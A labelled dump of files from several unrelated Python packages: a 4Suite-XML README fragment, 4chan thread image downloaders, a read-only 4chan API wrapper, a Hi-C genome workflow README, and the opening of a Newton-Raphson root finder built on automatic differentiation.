the exact location varies depending on the '--docdir'
Pre-generated API docs (HTML only) can be downloaded from 4suite.org
or from the 4Suite project page on SourceForge.
A detailed users' manual covering 4Suite's XML processing features is
available for viewing online at http://4suite.org/docs/CoreManual.xml.
The HTML version is generated and distributed with the API docs.
Many helpful and important docs can be found in Uche's Akara at
http://uche.ogbuji.net/tech/akara/4suite/
Any questions not answered by these docs should be asked on the 4Suite
mailing list. See http://lists.fourthought.com/mailman/listinfo/4suite
Developers and users can also confer via IRC on irc.freenode.net
channel #4suite.
ENVIRONMENT VARIABLES
=====================
None of these are necessary for a basic installation to work;
this list is just for reference.
FTSERVER_CONFIG_FILE = The absolute path of the repository config file.
Required if you want to use the repository features of 4Suite.
FT_DATABASE_DIR = The directory to use for filesystem-based repository
database. Optional (will default) but recommended if using the
FlatFile repository driver.
FTSS_USERNAME = Repository username to use when invoking 4ss command-
line tools, to avoid being prompted. This is overridden by
'4ss agent' or '4ss login' settings. Optional.
FTSS_PASSWORD_FILE = The absolute path of the file in which to store
4ss command-line tool login information. Used by '4ss login'.
Optional (will default to a file in the user's home directory, or
the Windows folder on Windows).
XML_CATALOG_FILES = The absolute paths or URIs of XML or TR9401 Catalogs
to use. Optional. Used by Ft.Xml.Catalog at import time. Items in the
list must be separated by os.pathsep (";" on Windows, ":" on POSIX).
XSLTINCLUDE = The absolute paths from which alternative URIs for the
XSLT stylesheet will be derived, for the purpose of extending the
resolution capability of xsl:include and xsl:import instructions.
Optional. Used by the 4xslt command-line tool only.
EXTMODULES = The names of Python modules that define XPath extension
functions and/or XSLT extension elements. Multiple modules must be
separated in the list by ":". Optional (this info can also be set
directly on instances of Ft.Xml.XPath.Context.Context or
Ft.Xml.Xslt.Processor.Processor).
UPGRADING
=========
Detailed instructions are not available, sorry.
Upgrading 4Suite from 0.11.1:
Remove all traces of 0.11.1 *and* PyXML first, since they were
integrated. Unset environment variables that were related to the
old version of 4Suite. Check your PATH; 4Suite 0.11.1 installed
command-line scripts to a different location than what you need now.
Also, update any Python scripts that you may have that rely on the
old APIs to use the new; for example, use Ft.Xml.XPath and Ft.Xml.Xslt
instead of xml.xpath and xml.xslt.
Upgrading from 0.12.0a1, 0.12.0a2, 0.12.0a3, 1.0a1, 1.0a3:
Installation locations varied; remove as much as you can first.
Check your PATH; as of 4Suite 1.0a4, the command-line scripts
are installed to a different location than before, but the old
scripts will not be removed when the new ones are installed.
Repository users:
Upgrading can be tricky. First read
http://lists.fourthought.com/pipermail/4suite/2004-October/012933.html
Also, if there is a 4ss.conf in the same location as the where
the default server config file will be installed (e.g., in
/usr/local/lib/4Suite on Unix), it will be renamed, so be sure
that your FTSERVER_CONFIG_FILE still points to your own config file
(it's a good idea to move it out of the way of future upgrades).
Upgrading from 1.0a4, 1.0b1, 1.0b2, 1.0b3, 1.0rc1, 1.0rc2:
There are no special instructions for upgrading from these versions.
Keeping up-to-date with current development code:
See the CVS instructions at http://4suite.org/docs/4SuiteCVS.xml | 4Suite-XML | /4Suite-XML-docs-1.0.2.zip/4Suite-XML-docs-1.0.2/README | README |
from urlparse import urlparse
import argparse
import httplib
import urllib2
import re
import time
import json
import os
import threading
sleep_time = 10
wait_thread_sleep_time = 2
cache_string = "Run out of free thread. Retry after" + \
str(wait_thread_sleep_time) + "second"
number_of_thread = 10
class downloadThread (threading.Thread):
def __init__(self, url, folder):
threading.Thread.__init__(self)
self.url = url
self.folder = folder
def run(self):
print "Starting download thread for " + self.url
download(self.url, self.folder)
print "Exiting download thread for " + self.url
def download(url, folder):
file_name = '.\\' + folder + '\\' + url.split('/')[-1]
if not os.path.exists('.\\' + folder + '\\'):
os.makedirs('.\\' + folder + '\\')
headers = {'User-Agent': 'Mozilla/5.0'}
req = urllib2.Request(url, None, headers)
u = urllib2.urlopen(req)
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
# Check if file is already downloaded
if os.path.isfile(file_name) and file_size == os.stat(file_name).st_size:
print "File "+file_name+" is already downloaded"
return
# Begin download
file_size_dl = 0
block_sz = 1024
with open(file_name, 'wb') as f:
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r" [%3.2f%%]" % (file_size_dl * 100. / file_size)
print "Downloading:" + file_name + status
def check_thread(board, sid):
prev_img_list = []
while True:
myConnection = httplib.HTTPSConnection(
"a.4cdn.org")
myConnection.request("GET", "/" + board + "/thread/" + sid + ".json")
reply = myConnection.getresponse()
print reply.status, reply.reason
if reply.status == 404:
print "404 Not found. Please check the URL again!"
break
temp_json = reply.read()
img_list = re.findall(r'"filename":".+?".+?"tim":.+?,', temp_json)
if not os.path.exists('.\\' + board + sid + '\\'):
os.makedirs('.\\' + board + sid + '\\')
with open('.\\' + board + sid + '\\' + sid + ".json", 'wb') as f:
f.write(temp_json)
# Print img_list
myConnection.close()
for i in img_list[len(prev_img_list):]:
j = json.loads('{'+i[:-1]+'}')
download_link = \
"http://i.4cdn.org/" + board + "/" + str(j['tim']) + j['ext']
print download_link
while (threading.activeCount() == number_of_thread):
print cache_string
time.sleep(wait_thread_sleep_time)
downloadThread(download_link, board + sid).start()
prev_img_list = img_list
time.sleep(sleep_time)
def parse_thread_URL(url):
url_components = urlparse(url).path.split('/')
return url_components[1], url_components[3]
prog_description = 'Download all images and json of a 4chan thread until '\
'thread dies. Resume and multi-thread download supported.'\
'From json and the images, the original html can be generated.'
parser = argparse.ArgumentParser(description=prog_description)
parser.add_argument('threadURL', metavar='Thread_URL',
help='The thread URL for example '
'http://boards.4chan.org/biz/thread/1873336', default=10)
parser.add_argument('-t', '--thread_num', metavar='number',
help='The number of download thread, default is 10')
args = parser.parse_args()
number_of_thread = args.thread_num
board, thread_id = parse_thread_URL(args.threadURL)
check_thread(board, thread_id) | 4cdl | /4cdl-0.1.tar.gz/4cdl-0.1/4cdl.py | 4cdl.py |
fourch
======
.. _docs: https://4ch.readthedocs.org
.. _repo: https://github.com/plausibility/4ch
fourch (stylized as 4ch) is a wrapper to the 4chan JSON API, provided by moot. It allows you to interact with 4chan (in a READONLY way) easily through your scripts.
Originally <strike>stolen</strike> forked from `e000/py-4chan <https://github.com/e000/py-4chan>`_, but then I moved repos and renamed stuff since I'm pretty bad about that.
Requirements
------------
- Python 2.7 (what I test with, 2.x might work)
- requests
Notes
-----
- This isn't guaranteed to work all the time; after all, the API may change, and 4ch will have to be updated accordingly.
- If a feature is missing, open an issue on the `repo`_, and it may well be implemented.
Running / Usage
---------------
- Install & import: ``$ pip install 4ch``, ``import fourch``
- See the `docs`_
Contributing
------------
If you're interested in contributing to the usability of 4ch, or just want to give away stars, you can visit the 4ch github `repo`_.
| 4ch | /4ch-1.0.0.tar.gz/4ch-1.0.0/README.rst | README.rst |
import requests
from .reply import Reply
class Thread(object):
""" This object stores information about the given thread.
It has a list of fourch.replies, as well as options to
easily pull in updates (new posts), and create an instance
with the json of a thread.
"""
def __init__(self, board, res):
""" Create the thread instance and initialize variables.
:param board: the :class:`fourch.Board` parent instance
:type board: :class:`fourch.Board`
:param res: the given threads number
:type res: str or int
"""
self._board = board
self.res = res
self.alive = True
self.op = None
self.replies = []
self.omitted_posts = 0
self.omitted_images = 0
# If this is a precached thread, should it get updated?
self._should_update = False
# HTTP Last-Modified header for If-Modified-Since
self._last_modified = None
def __repr__(self):
end = ""
if self.omitted_posts or self.omitted_images:
end = ", {0} omitted posts, {1} omitted images".format(
self.omitted_posts, self.omitted_images
)
return "<{0} /{1}/{2}, {3} replies{4}>".format(
self.__class__.__name__,
self._board.name,
self.res,
len(self.replies),
end
)
@staticmethod
def from_req(board, res, r):
""" Create a thread object from the given request.
If the thread has 404d, this will return None,
and if it isn't 200 OK, it will raise_for_status().
Actually creates the thread by calling :func:`from_json`.
:param board: the :class:`fourch.Board` parent instance
:type board: :class:`fourch.Board`
:param res: the given threads number
:type res: str or int
:param r: the requests object
:type r: requests.models.Response
"""
if r.status_code == requests.codes.not_found:
return None
elif r.status_code == requests.codes.ok:
return Thread.from_json(board,
r.json(),
res=res,
last_modified=r.headers["last-modified"])
else:
r.raise_for_status()
@staticmethod
def from_json(board, json, res=None, last_modified=None):
""" Create a thread object from the given JSON data.
:param board: the :class:`fourch.Board` parent instance
:type board: :class:`fourch.Board`
:param json: the json data from the 4chan API
:type board: dict
:param res: the given threads number
:type res: str or int
:param last_modified: when was the page last modified
:type last_modified: int or None
:return: the created :class:`fourch.Thread`
:rtype: :class:`fourch.Thread`
"""
t = Thread(board, res)
t._last_modified = last_modified
replies = json["posts"]
t.op = Reply(t, replies.pop(0))
t.replies = [Reply(t, r) for r in replies]
if res is None:
t._should_update = True
t.res = t.op.number
t.omitted_posts = t.op._json.get("omitted_posts", 0)
t.omitted_images = t.op._json.get("omitted_images", 0)
return t
@property
def sticky(self):
""" Is this thread stuck?
:return: whether or not the thread is stuck
:rtype: bool
"""
return self.op.sticky
@property
def closed(self):
""" Is the thread closed?
:return: whether or not the thread is closed
:rtype: bool
"""
return self.op.closed
@property
def last_reply(self):
""" Return the last :class:`fourch.Reply` to the thread, or the op
if there are no replies.
:return: the last :class:`fourch.Reply` to the thread.
:rtype: :class:`fourch.Reply`
"""
if not self.replies:
return self.op
return self.replies[-1]
@property
def images(self):
""" Create a generator which yields all of the image urls for the thread.
:return: a generator yieling all image urls
:rtype: generator
"""
yield self.op.file.url
for r in self.replies:
if not r.has_file:
continue
yield r.file.url
def update(self, force=False):
""" Update the thread, pulling in new replies,
appending them to the reply pool.
:param force: should replies be replaced with fresh reply objects
:type force: bool
:return: the number of new replies
:rtype: int
"""
if not self.alive and not force:
return 0
url = self._board.url("api_thread",
board=self._board.name,
thread=self.res)
headers = None
if self._last_modified:
# If-Modified-Since, to not waste bandwidth.
headers = {
"If-Modified-Since": self._last_modified
}
r = self._board._session.get(url, headers=headers)
if r.status_code == requests.codes.not_modified:
# 304 Not Modified
return 0
elif r.status_code == requests.codes.not_found:
# 404 Not Found
self.alive = False
# Remove from cache.
self._board._cache.pop(self.res, None)
return 0
elif r.status_code == requests.codes.ok:
if not self.alive:
self.alive = True
self._board._cache[self.res] = self
self._should_update = False
self.omitted_posts = 0
self.omitted_images = 0
self._last_modified = r.headers["last-modified"]
replies = r.json()["posts"]
post_count = len(self.replies)
self.op = Reply(self, replies.pop(0))
if not force:
self.replies.extend(
[Reply(self, p)
for p in replies
if p["no"] > self.last_reply.number]
)
else:
self.replies = [Reply(self, p) for p in replies]
post_count_new = len(self.replies)
post_count_diff = post_count_new - post_count
if post_count_diff < 0:
raise Exception("post count delta is somehow negative...")
return post_count_diff
else:
r.raise_for_status() | 4ch | /4ch-1.0.0.tar.gz/4ch-1.0.0/fourch/thread.py | thread.py |
import fourch
import base64
import re
class Reply(object):
""" This object stores information regarding a specific post
on any given thread. It uses python properties to easily
allow access to information.
"""
def __init__(self, thread, json):
""" Initialize the reply with the relevant information
:param thread: the :class:`fourch.Thread` parent instance
:type thread: :class:`fourch.Thread`
:param json: the json data for this post
:type json: dict
"""
self._thread = thread
self._json = json
def __repr__(self):
return "<{0}.{1} /{2}/{3}#{4}, image: {5}>".format(
self.__class__.__module__,
self.__class__.__name__,
self._thread._board.name,
self._thread.res,
self.number,
bool(self.has_file)
)
@property
def is_op(self):
"""Is this post the OP (first post in thread)"""
return self._json.get("resto", 1) == 0
@property
def number(self):
"""The number relating to this post"""
return self._json.get("no", 0)
@property
def reply_to(self):
"""What post ID is this a reply to"""
return self._json.get("resto", 0)
@property
def sticky(self):
"""Is this thread stuck?"""
return bool(self._json.get("sticky", 0))
@property
def closed(self):
"""Is this thread closed?"""
return bool(self._json.get("closed", 0))
@property
def now(self):
"""Humanized date string of post time"""
return self._json.get("now", "")
@property
def timestamp(self):
"""The UNIX timestamp of post time"""
return self._json.get("time", 0)
@property
def tripcode(self):
"""Trip code, if any, of the post"""
return self._json.get("trip", "")
@property
def id(self):
"""Post ID, if any. (Admin, Mod, Developer, etc)"""
return self._json.get("id", "")
@property
def capcode(self):
"""Post capcode, if any. (none, mod, admin, etc)"""
return self._json.get("capcode", "")
@property
def country(self):
""" The country code this was posted from. Two characters, XX if
unknown.
"""
return self._json.get("country", "XX")
@property
def country_name(self):
"""The name of the country this was posted from"""
return self._json.get("country_name", "")
@property
def email(self):
"""The email attached to the post"""
return self._json.get("email", "")
@property
def subject(self):
"""The subject of the post"""
return self._json.get("sub", "")
@property
def comment(self):
"""The comment, including escaped HTML"""
return self._json.get("com", "")
@property
def comment_text(self):
""" The stripped (mostly) plain text version of the comment.
The comment goes through various regexes to become (mostly) clean.
Some HTML will still be present, this is because Python's
:mod:`HTMLParser` won't escape everything, and since it's
undocumented, only god may know how to add more escapes.
"""
import HTMLParser
com = self.comment
# <span class="quote">>text!</span>
# --- >text!
com = re.sub(r"\<span[^>]+\>(?:>|>)([^</]+)\<\/span\>",
r">\1",
com,
flags=re.I)
# <a class="quotelink" href="XX#pYYYY">>>YYYY</a>
# --- >>YYYY
com = re.sub(r"\<a[^>]+\>(?:>|>){2}(\d+)\<\/a\>",
r">>\1",
com,
flags=re.I)
# Add (OP) to quotelinks to op
com = re.sub(r"\>\>({0})".format(self._thread.op.number),
r">>\1 (OP)",
com,
flags=re.I)
# <br> or <br /> to newline
com = re.sub(r"\<br ?\/?\>", "\n", com, flags=re.I)
# Send the remaining HTML through the HTMLParser to unescape.
com = HTMLParser.HTMLParser().unescape(com)
return com
@property
def url(self):
"""The URL of the post on the parent thread"""
return "{0}{1}/{2}/thread/{3}#p{4}".format(
self._thread._board.proto,
self._thread._board._urls["boards"],
self._thread._board.name,
self._thread.res,
self.number
)
# File related
@property
def has_file(self):
"""Whether or not this post has an image attached"""
return "filename" in self._json
@property
def file(self):
""" This holds the information regarding the image attached
to a post, if there is one at all.
It returns the relevant information in a class format,
accessible via ``r.file.url``, for example.
Information stored:
- renamed
- name
- extension
- size
- md5
- md5b64
- width
- height
- thumb_width
- thumb_height
- deleted
- spoiler
- url
- thumb_url
:return: a struct with information related to image
"""
if not self.has_file:
return fourch.struct()
f = {
"renamed": self._json.get("tim", 0),
"name": self._json.get("filename", ""),
"extension": self._json.get("ext", ""),
"size": self._json.get("fsize", 0),
"md5": base64.b64decode(self._json.get("md5")),
"md5b64": self._json.get("md5", ""),
"width": self._json.get("w", 0),
"height": self._json.get("h", 0),
"thumb_width": self._json.get("tn_w", 0),
"thumb_height": self._json.get("tn_h", 0),
"deleted": bool(self._json.get("filedeleted", 0)),
"spoiler": bool(self._json.get("spoiler", 0)),
"url": "",
"thumb_url": ""
}
f["url"] = "{0}{1}/{2}/{3}{4}".format(
self._thread._board.proto,
fourch.urls["images"],
self._thread._board.name,
f["renamed"],
f["extension"]
)
f["thumb_url"] = "{0}{1}/{2}/{3}s.jpg".format(
self._thread._board.proto,
fourch.urls["thumbs"],
self._thread._board.name,
f["renamed"]
)
return fourch.struct(**f) | 4ch | /4ch-1.0.0.tar.gz/4ch-1.0.0/fourch/reply.py | reply.py |
import requests
import fourch
from .thread import Thread
class Board(object):
""" fourch.Board is the master instance which allows easy access to the
creation of thread objects.
"""
def __init__(self, name, https=False):
""" Create the board instance, and initialize internal variables.
:param name: The board name, minus slashes. e.g., 'b', 'x', 'tv'
:type name: string
:param https: Should we use HTTPS or HTTP?
:type https: bool
"""
self.name = name
self.https = https
self._session = None
self._cache = {} # {id: fourch.Thread(id)} -- prefetched threads
def __repr__(self):
# TODO: Fetch title/nsfw status from /boards.
return "<{0} /{1}/>".format(
self.__class__.__name__,
self.name
)
@property
def session(self):
if self._session is None:
self._session = requests.Session()
uaf = "fourch/{0} (@https://github.com/sysr-q/4ch)"
self._session.headers.update({
"User-agent": uaf.format(fourch.__version__),
})
return self._session
@property
def proto(self):
# Since this might change on-the-fly..
return "https://" if self.https else "http://"
def url(self, endpoint, *k, **v):
return (self.proto
+ fourch.urls["api"]
+ fourch.urls[endpoint].format(*k, **v))
def catalog(self):
""" Get a list of all the thread OPs and last replies.
"""
url = self.url("api_catalog", board=self.name)
r = self.session.get(url)
return r.json()
def threads(self):
""" Get a list of all the threads alive, and which page they're on.
You can cross-reference this with a threads number to see which
page it's on at the time of calling.
"""
url = self.url("api_threads", board=self.name)
r = self.session.get(url)
return r.json()
def thread(self, res, update_cache=True):
""" Create a :class:`fourch.thread` object.
If the thread has already been fetched, return the cached thread.
:param res: the thread number to fetch
:type res: str or int
:param update_cache: should we update if it's cached?
:type update_cache: bool
:return: the :class:`fourch.Thread` object
:rtype: :class:`fourch.Thread` or None
"""
if res in self._cache:
t = self._cache[res]
if update_cache:
t.update()
return t
url = self.url("api_thread", board=self.name, thread=res)
r = self.session.get(url)
t = Thread.from_req(self, res, r)
if t is not None:
self._cache[res] = t
return t
def page(self, page=1, update_each=False):
""" Return all the threads in a single page.
The page number is one-indexed. First page is 1, second is 2, etc.
If a thread has already been cached, return the cache entry rather
than making a new thread.
:param page: page to pull threads from
:type page: int
:param update_each: should each thread be updated, to pull all
replies
:type update_each: bool
:return: a list of :class:`fourch.Thread` objects, corresponding to
all threads on given page
:rtype: list
"""
url = self.url("api_board", board=self.name, page=page)
r = self.session.get(url)
if r.status_code != requests.codes.ok:
r.raise_for_status()
json = r.json()
threads = []
for thj in json["threads"]:
t = None
res = thj["posts"][0]["no"]
if res in self._cache:
t = self._cache[res]
t._should_update = True
else:
t = Thread.from_json(self,
thj,
last_modified=r.headers["last-modified"])
self._cache[res] = t
if update_each:
t.update()
threads.append(t)
return threads
def thread_exists(self, res):
""" Figure out whether or not a thread exists.
This is as easy as checking if it 404s.
:param res: the thread number to fetch
:type res: str or int
:return: whether or not the given thread exists
:rtype: bool
"""
url = self.url("api_thread", board=self.name, thread=res)
return self.session.head(url).status_code == requests.codes.ok | 4ch | /4ch-1.0.0.tar.gz/4ch-1.0.0/fourch/board.py | board.py |
4channel is a python3 tool and module to download all images/webm from a 4channel thread.
Installation
---------------
### Dependencies
4channel requires:
- python (>= 3.6)
### User installation
```
pip install 4channel
```
Usage
---------
```
usage: 4channel [-h] [--webm] [--watch] [--dryrun] [-r RECURSE] url [out]
positional arguments:
url the url of the thread.
out specify output directory (optional)
optional arguments:
-h, --help show this help message and exit
--webm in addition to images also download webm videos.
--watch watch the thread every 60 seconds for new images.
--dryrun dry run without actually downloading images.
-r RECURSE, --recurse RECURSE
recursively download images if 1st post contains link to previous thread up to specified depth
examples:
python -m fourchannel https://boards.4channel.org/g/thread/76759434#p76759434
import fourchannel as f
f.download(url='https://boards.4channel.org/g/thread/76759434#p76759434')
```
| 4channel | /4channel-0.0.9.tar.gz/4channel-0.0.9/README.md | README.md |
import sys, json, os
import urllib.request
import urllib.parse
import argparse
import time
import signal
import re
"""
notes:
- for module to be importable, it is good idea not to do ArgumentParser in global scope
- to avoid typing 'import fourchannel.fourchannel' and then 'fourchannel.fourchannel.download'
'from .fourchannel import download' was added to __init__.py
"""
URL = 'https://a.4cdn.org/'
IMAGE_URL = 'https://i.4cdn.org/'
allowed_types = ['.jpg', '.png', '.gif']
watching = False
max_retry = 1
resorted_to_archive = False
hit_cloudflare_block = False
list_of_cloudflare_blocked_media_file = []
def fuuka_retrieve(result, board, thread, dryrun):
i = 0
global hit_cloudflare_block
global list_of_cloudflare_blocked_media_file
for post in result[thread]['posts']:
if result[thread]['posts'][post]['media'] is None:
continue
filename = result[thread]['posts'][post]['media']['media_orig']
if filename[filename.index('.'):] in allowed_types and not os.path.exists(filename):
if not dryrun:
# retrieve file from warosu.org, https://i.warosu.org/data/<board>/img/0xxx/xx/<filename>
thread_first_3nums = '0' + thread[:3]
thread_forth_and_fifth_nums = thread[3:5]
url_warosu = 'https://i.warosu.org/data/' + board + '/img/' + thread_first_3nums + '/' + thread_forth_and_fifth_nums + '/' + filename
if not hit_cloudflare_block:
print(f"downloading {filename}")
req = urllib.request.Request(url_warosu, headers={'User-Agent': 'Mozilla/5.0'})
try:
response = urllib.request.urlopen(req)
with open(filename, "wb") as file:
file.write(response.read())
i = i+1
except urllib.error.HTTPError as e:
if e.code in [503] and e.hdrs['Server'] == 'cloudflare':
hit_cloudflare_block = True
print(f"hit cloudflare block: {e}")
else:
print(f"cloudflare block, download {url_warosu} manually in the browser")
list_of_cloudflare_blocked_media_file.append(url_warosu)
else:
print(f"skipping {filename}, dryrun")
else:
if not watching:
print(f"skipping {filename}, already present")
print(f"downloaded {i} files from https://i.warosu.org/ thread# {thread}")
# loops through posts of given thread and downloads media files
def load_thread_json(board, thread, url, recurse, dryrun=False):
global resorted_to_archive
response = None
archive_url_is_being_used_for_this_stack_frame_so_call_fuuka = False
try:
if resorted_to_archive is True:
archive_url_is_being_used_for_this_stack_frame_so_call_fuuka = True
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
response = urllib.request.urlopen(req)
else:
response = urllib.request.urlopen(url)
except urllib.error.HTTPError as e:
if e.code in [404]:
if not resorted_to_archive:
resorted_to_archive = True
newurl = '%s=%s&num=%s' % ('https://archived.moe/_/api/chan/thread?board', board, thread)
print(f"url {url} returned 404, resorting to {newurl}")
load_thread_json(board, thread, newurl, recurse-1, dryrun)
else:
global max_retry
max_retry = max_retry - 1
if max_retry < 1:
return
else:
print(f"archive url {url} returned 404, retrying...")
load_thread_json(board, thread, newurl, recurse, dryrun)
else:
print(f"unhandled error: {e}")
return
try:
result = json.loads(response.read())
op_subject = ''
op_post_time = ''
if recurse > 0:
try:
op_comment = ''
if archive_url_is_being_used_for_this_stack_frame_so_call_fuuka is True:
# for json from fuuka the tread# to previous thread is in slightly different place
op_comment = result[thread]['op']['comment']
op_subject = result[thread]['op']['title']
op_post_time = result[thread]['op']['fourchan_date']
#prev_thread_num = re.search(r'.*Previous thread:\s*>>(\d{8}).*', op_comment).group(1)
#prev_thread_num = re.search(r'.*[pP]revious [tT]hread:\s*.*?(\d{8}).*', op_comment).group(1)
prev_thread_num = re.search(r'.*[pP]revious:? (?:[tT]hread:)?\s*.*?(\d{8}).*', op_comment).group(1)
newurl = '%s=%s&num=%s' % ('https://archived.moe/_/api/chan/thread?board', board, prev_thread_num)
print(f"recursing to archive thread# {prev_thread_num} at {newurl}")
load_thread_json(board, prev_thread_num, newurl, recurse-1, dryrun)
else:
op_comment = result['posts'][0]['com']
op_subject = result['posts'][0]['sub'] if result['posts'][0].get('sub') is not None else 'No title'
op_post_time = result['posts'][0]['now']
#prev_thread_path = re.search(r'^.*[pP]revious [tT]hread.*href="([^"]+)".*$', op_comment).group(1)
#prev_thread_num = re.search(r'.*[pP]revious [tT]hread:\s*.*?(\d{8}).*', op_comment).group(1)
prev_thread_num = re.search(r'.*[pP]revious:? (?:[tT]hread:)?\s*.*?(\d{8}).*', op_comment).group(1)
prev_thread_path = '/' + board + '/thread/' + prev_thread_num
split = urllib.parse.urlparse('https://boards.4channel.org' + prev_thread_path).path.replace('/', ' ').split()
newurl = '%s%s/thread/%s.json' % (URL, split[0], split[2])
print(f"recursing to {prev_thread_path}")
load_thread_json(board, split[2], newurl, recurse-1, dryrun)
except AttributeError:
print(f"did not find a link to previous thread. the comment was:\n---\n{op_comment}\n---")
pass
if archive_url_is_being_used_for_this_stack_frame_so_call_fuuka is True:
fuuka_retrieve(result, board, thread, dryrun)
else:
i = 0
total_bytes_dw = 0
for post in result['posts']:
try:
filename = str(post['tim']) + post['ext']
if post['ext'] in allowed_types and not os.path.exists(filename):
if not dryrun:
print(f"downloading {filename}")
fn, headers = urllib.request.urlretrieve(IMAGE_URL + board + '/' + filename, filename)
total_bytes_dw = total_bytes_dw + int(headers['Content-Length'])
i = i+1
else:
print(f"skipping {filename}, dryrun")
else:
if not watching:
print(f"skipping {filename}, already present")
except KeyError:
continue
print(f"downloaded {'%.*f%s' % (2, total_bytes_dw / (1<<20), 'MB')} of {i} files from {url} ({op_subject}) ({op_post_time})")
except ValueError:
sys.exit('no response, thread deleted?')
# the key function that that we expect to be used when 4channel is imported as a module
# this function parses user's URL and calls load_thread_json() that does the actual downloading
def download(**kwargs):
if 'boards.4channel.org' not in kwargs.get('url'):
sys.exit("you didn't enter a valid 4channel URL")
if kwargs.get('recurse') is None:
kwargs['recurse'] = 0 # handle case when module is imported and .download() is called with just url
split = urllib.parse.urlparse(kwargs.get('url')).path.replace('/', ' ').split()
board, thread = split[0], split[2]
url = '%s%s/thread/%s.json' % (URL, board, thread)
outdir = kwargs.get('out') if kwargs.get('out') is not None else thread
try:
os.mkdir(outdir)
print(f"created {os.path.join(os.getcwd(), outdir)} directory...")
except OSError:
print(f"{outdir} directory already exists, continuing...")
pass
if os.path.basename(os.getcwd()) != outdir:
os.chdir(outdir)
if kwargs.get('webm') is True:
allowed_types.append('.webm')
if kwargs.get('watch') is True:
global watching
watching = True
print(f"watching /{board}/{thread} for new images")
while True:
load_thread_json(board, thread, url, 0)
time.sleep(60)
else:
print(f"downloading /{board}/{thread}")
load_thread_json(board, thread, url, kwargs.get('recurse'), kwargs.get('dryrun'))
if hit_cloudflare_block:
with open('_cloudflare_blocked_files.txt', "w") as f:
print(*list_of_cloudflare_blocked_media_file, sep="\n", file=f)
os.chdir("..")
def signal_handler(signal, frame):
print('\nSIGINT or CTRL-C detected, exiting gracefully')
sys.exit(0)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("url", help='the url of the thread.')
parser.add_argument("out", nargs='?', help='specify output directory (optional)')
parser.add_argument("--webm", action="store_true", help="in addition to images also download webm videos.")
parser.add_argument("--watch", action='store_true', help='watch the thread every 60 seconds for new images.')
parser.add_argument("--dryrun", action="store_true", help="dry run without actually downloading images.")
parser.add_argument('-r', "--recurse", type=int, default=0, help="recursively download images if 1st post contains link to previous thread up to specified depth")
args = parser.parse_args()
signal.signal(signal.SIGINT, signal_handler)
download(**vars(args)) # pass in args as dict and unpack
if __name__ == '__main__':
main() | 4channel | /4channel-0.0.9.tar.gz/4channel-0.0.9/fourchannel/fourchannel.py | fourchannel.py |
# 4DGB Workflow
![](doc/workflow.png)
A dockerized application implementing an end-to-end workflow to process Hi-C data files and displaying their structures in an instance of the [4D Genome Browser](https://github.com/lanl/4DGB).
The workflow takes ```.hic``` data, processes the data and creates a running server that can be used to view the data with a web browser. The system takes advantage of previous runs, so if you've already computed some data, it won't be recomputed the next time the workflow is run.
The workflow is split into two stages: "Build" and "View". Each implemented with a separate docker image. The Build stage does most of the computation (including the most expensive part, running the LAMMPS simulation) and outputs a project suitable for viewing with the [4D Genome Browser](https://github.com/lanl/4DGB). The View stage simply creates an instance of this browser, allowing the user to view their project.
## Setting up Input Data
1. Create a directory to contain all of your input data. In it, create a `workflow.yaml` file with the following format:
```yaml
project:
resolution: 200000 # optional (defaults to 200000)
chromosome: X # optional (defaults to 'X')
count_threshold: 2.0 # optional (defaults to 2.0)
datasets:
- name: "Data 01"
hic: "path/to/data_01.hic"
- name: "Data 02"
hic: "path/to/data_02.hic"
```
*See the [File Specification Document](doc/project.md) for full details on what can be included in the input data*
2. Checkout submodules
```sh
git submodule update --init
```
3. Build the Docker images.
```sh
make docker
```
4. Run the browser!
```sh
./4DGBWorkflow run /path/to/project/directory/
```
**Example output:**
```
$ ./4DGBWorkflow run ./example_project
[>]: Building project... (this may take a while)
#
# Ready!
# Open your web browser and visit:
# http://localhost:8000/compare.html?gtkproject=example_project
#
# Press [Ctrl-C] to exit
#
```
If this is the first time running a project, this may take a while, since it needs to run a molecular dynamics simulation with LAMMPS on your input data. The next time you run it, it won't need to run the simulation again. If you update the input files, then the simulation will automatically be re-run!
**Example Screenshot**
![](doc/example_screen.png)
## Help for Maintainers
See the [Publising](./doc/publishing.md) doc for information on publishing and releasing new versions.
## ❄️ For Nix Users
For initiates of the [NixOS cult](https://nixos.org/), there is a Nix Flake which exports a package of the workflow builder as well as development environment in which you can easily run the workflow. Each submodule also has its in own flake exporting relevant packages.
To enter the development environment (you need to enable submodules):
```sh
nix develop '.?submodules=1'
```
To build a project and run the browser:
```sh
# Build the workflow script
nix build '.?submodules=1#workflow-build'
# Run the just-built workflow
./result/bin/4dgb-workflow-build example_project/ example_out/
# Run the browser (which is available in the PATH in the dev environment)
PROJECT_HOME=example_out/ gtkserver.py
```
| 4dgb-workflow | /4dgb-workflow-1.5.6.tar.gz/4dgb-workflow-1.5.6/README.md | README.md |
import numpy as np
from matplotlib import pyplot as plt
from pyautodiff import *
def Newton_Raphson_method(fn, xk, stepsize_thresh=1e-6, max_iters=1000, success_tolerance=1e-6, debug=False):
"""
Newton's method to find root.
Args:
fn: funtion
xk: initial guess
stepsize_thresh: If ||x_{k+1} - x_{k}|| <= thresh, return
max_iters: If #iters > max_iters, return
success_tolerance: The absolute tolerance for fn(root)
debug: Defaults to False. If True, print info for every iteration
Returns:
A dict
"""
f = None
is_scalar = (np.ndim(xk) == 0)
checker = abs if is_scalar else np.linalg.norm
solver = (lambda x, y: y / x) if is_scalar else np.linalg.solve
offset = 1
for k in range(max_iters):
f = fn(Var(xk, "x")) # This is a Var instance!! Access val and der by .val and .diff() respectively
delta_x = solver(f.diff(), -f.val)
if checker(delta_x) < stepsize_thresh:
offset = 0
break
if debug:
print(f"k={k}\tx={np.round(xk, 2)}\tf(x)={np.round(f.val)}\tf'(x)={np.round(f.diff())}")
xk = xk + delta_x
return {
"succeed": np.allclose(f.val, 0, atol=success_tolerance),
"iter": k + offset,
"x": xk,
"f(x)": f.val,
"f\'(x)": f.diff()
}
def cal_val_der(fn, xs):
vals = []
ders = []
for x in xs:
try:
if not isinstance(x, (Var, VarAutoName)):
y = fn(VarAutoName(x))
else:
y = fn(x)
except:
y = Var(0)
finally:
vals.append(y.val)
ders.append(y.diff())
return vals, ders
def draw_scalar(fn, roots, plt_range=[0, 10]):
x = np.linspace(plt_range[0], plt_range[1], 1000).tolist()
y, d = cal_val_der(fn, x)
